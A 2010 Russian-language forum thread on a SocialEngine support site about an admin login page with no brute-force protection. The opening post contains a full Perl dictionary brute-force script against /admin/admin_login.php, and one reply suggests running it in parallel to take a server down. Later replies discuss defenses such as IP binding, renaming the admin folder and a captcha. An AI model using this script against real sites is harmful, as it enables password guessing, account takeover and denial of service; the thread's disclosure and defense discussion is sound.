1. Мы продолжаем публиковать интересные статьи на тему SocialEngine 4. Одна из статей посвящена правильному выбору сервера для вашей социальной сети, а другая содержит советы по увеличению производительности платформы. Также мы добавили большую статью о пользовательских уровнях. Ознакомиться со статьями вы можете в разделе Вопросы и Ответы SocialEngine 4.
  2. Вам кажется, что ваша версия SocialEngine 4, работает медленно?

    Голосуйте. Пишите свою версию системы, железо на чем работает и количество пользователей. Будем увеличивать производительность :-) Подробнее

  3. В связи с участившимися случаями попыток продажи пользователями форума различных "сборок" коммерческих социальных платформ, обычно основанных на SocialEngine 3, вводится новое правило для форума. Запрещается создание тем или размещение в уже созданных предложений о продаже или размещение ссылок на сайты, где происходит продажа "сборок". Пользователи, которые продолжат свою коммерческую деятельность в данном направлении, будут заблокированы. Подробнее.

Защита админки (Брут perl)

Discussion in 'Прочая Поддержка - Help Requests' started by n0byk, Dec 9, 2010.

  1. n0byk Thread starter Novice member


    Offline
    Message Count:
    8
    Likes Received:
    2
    Всем привет!

    Ветки форума по безопасности не нашел, поэтому пишу тут.

    И так начнем, админка в Se находится по адресу http://site.com/admin/admin_login.php все знают :p. Если посмотреть, то зашиты от брута там нет и в форму входа можно подставлять связку логин+пасс бесконечно много раз facepalm (НЕ предусмотрен даже бан например как на Вобле или других форума и CMS).

    И так не долго думая решил написать брут выглядит он примерно так.
    [SPOILER]#!/usr/bin/perl
    ### bruter for SE by n0byk icq 300436 ####
    use IO::Socket;
    $|++;
    $server="сервер";
    $port="порт";
    $logfile="куда сохранить логин+пасс";
    $words="словарь";
    $user="Юзер";
    $dir="/admin/admin_login.php";

    open(file, "$words") or die print "$!\n";
    @data=<file>;
    $total=@data;
    close file;
    foreach $pass (@data) {
    $i++;
    chomp($pass);
    $socket=IO::Socket::INET->new(PeerAddr => $server,
    PeerPort => $port,
    Proto => tcp)
    or die print "Unable to connect to $server:$port\n";
    $socket->autoflush(1);

    $post="username=$user&passw0rd=$pass&";
    $len=length($post);
    $len+=1;
    print $socket "POST $dir HTTP/1.1\r\n";
    print $socket "Host: $server\r\n";;
    print $socket "Content-Type: application/x-www-form-urlencoded\r\n";
    print $socket "Connection: Close\r\n";
    print $socket "Content-Length: $len\r\n";
    print $socket "\r\n$post\r\n";

    $socket->recv($answer,1024);
    ##print "$answer \n";
    if ($answer=~/302 Found/)
    {
    open(logf, ">>$logfile") or die print "$!\n";
    print logf "$user $pass\n";
    close logf;
    close($socket);
    print "$user $pass\n";
    exit 0;
    }
    }[/SPOILER]
    В коде умышленно сделаны ошибки, знающие люди исправят 100% (сделано для зашиты от школоты и etc)

    Меры предосторожности.
    1) удалить директорию admin и заливать при необходимости - самое простое
    2) доработки в коде...

    Вообщем вот написал кротка, думаю все понятно)))
  2. afsun Active member


    Offline
    Message Count:
    182
    Likes Received:
    53
    Для защиты админки придумана привязка по ип на папку м куда будет ломиться брут интересно тогда?
  3. Adre Famous member


    Offline
    • Знаменитый
    Message Count:
    370
    Likes Received:
    96
    Вообще интересно. Делаем по другому. Берем любого пользователя, и в 10 потоков брутим. Канал 1 ГБ. Сервак ложится... Идея интересна что бы проверить свои серваки на предмет ДОС атаки... Про 4 ветку не говорю, походу разработчики пошли не туда... 3 тестим. Думаю прикольно, всего 1 скриптом.
    Думаю есть над чем подумать.
    Хотя защиты уйма...
  4. n0byk Thread starter Novice member


    Offline
    Message Count:
    8
    Likes Received:
    2
    afsun,

    Давайте так, Это уязвимость и серьезная, способов зашиты конечно море... спору тоже нет.

    ЗЫ. у многих ip динамический а запороленные дерриктории тоже брутятся нет вопросов....

    зы2. на момент написания вашего поста у Вас стояла привязка по ip на папку?
    Я о том, что о мерах зашиты никто не думает, а скрипт вот он....

    ---------- Сообщение добавлено в 21:45 ---------- Предыдущее сообщение было в 21:35 ----------

    И идея для Админов сайта, может сделать ветку форума в которой будут обсуждаться баги , уязвимости скрипта?
  5. Gooos абырвалГ


    Offline
    • Admin
    Message Count:
    2,435
    Likes Received:
    645
    My version of SE:
    3.20
    А как на счёт переименовать админскую папку?
  6. n0byk Thread starter Novice member


    Offline
    Message Count:
    8
    Likes Received:
    2
    Gooos,
    Можно, но это просто затруднит поиски админки (папки) форма входа та же самая...
  7. xaxa15 Novice member


    Offline
    Message Count:
    46
    Likes Received:
    1
    а если перемеиновать папку admin во что нибудь более супер сложное...это подойдет? просто влом как то каждый раз закачивать админку и удалять...)
  8. n0byk Thread starter Novice member


    Offline
    Message Count:
    8
    Likes Received:
    2
    Есть идея капчу поставить... Этим и займусь завтро, как сделаю выложу....
  9. afsun Active member


    Offline
    Message Count:
    182
    Likes Received:
    53
    С первого дня существ. проекта.

Share This Page

All rights reserved SocEngine.ru ©